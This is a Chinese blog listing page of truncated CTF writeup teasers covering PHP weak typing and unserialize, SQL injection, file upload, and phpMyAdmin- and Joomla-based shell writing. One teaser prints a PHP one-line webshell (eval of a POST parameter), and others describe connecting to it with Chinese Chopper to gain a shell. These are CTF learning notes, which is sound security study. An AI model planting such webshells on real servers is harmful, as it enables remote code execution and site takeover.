驻足

CS专业/CTF小白

排序:
默认
按更新时间
按访问量

实验吧天网管理系统Writeup

实验吧天网管理系统Writeup 原题地址 实验吧–天网管理系统 用到的知识点: 1.php弱类型相等 2.php函数serialize()与unserialize()(序列化和反序列化) 首先查看源文件,发现提示: <!-- $test=$_GET['use...

2018-05-01 18:25:49

阅读数:13

评论数:0

BugKuCTF---sql注入Writeup

我的博客 Marsguest’s BLog BugKuCTF—sql注入Writeup 原题地址 http://103.238.227.13:10083/ 首先构造链接 http://103.238.227.13:10083/?id=1' 发现存在过滤,页面没什么反应。右键源文件...

2018-04-22 19:26:01

阅读数:92

评论数:0

第三届“百越杯”福建省高校网络空间安全大赛Do you know upload?Writeup

推一波我的博客 Marsguest’s Blog 第三届“百越杯”福建省高校网络空间安全大赛Do you know upload?Writeup 首先,直接上传一句话木马1.php文件 <?php eval($_POST['cmd']);?> ...

2018-04-21 18:03:48

阅读数:123

评论数:0

i春秋 429-线上赛题(二)Writeup

“360企业安全春秋杯”网络安全技术大赛—-线上赛题(二)Writeup 主体思路 利用phpmyadmin中记录查询日志功能,成功将一句话写入服务器中,之后菜刀连接拿到shell 具体实现 具体实现部分我已在我的博客中写明,还请移步 Marsguest’s Blog...

2018-04-18 20:30:29

阅读数:45

评论数:0

i春秋 429-线上赛题(一)Writeup

“360企业安全春秋杯”网络安全技术大赛—-线上赛题(一)Writeup 主体思路 利用joomla选择模板并且能自己编写网页文件的漏洞,将一句话木马写入网页中,之后菜刀连接拿到shell 具体实现 具体实现部分我已在我的博客中写明,还请移步 Marsguest’s Blog...

2018-04-18 20:27:57

阅读数:47

评论数:0

提示
确定要删除当前文章?
取消 删除
关闭
关闭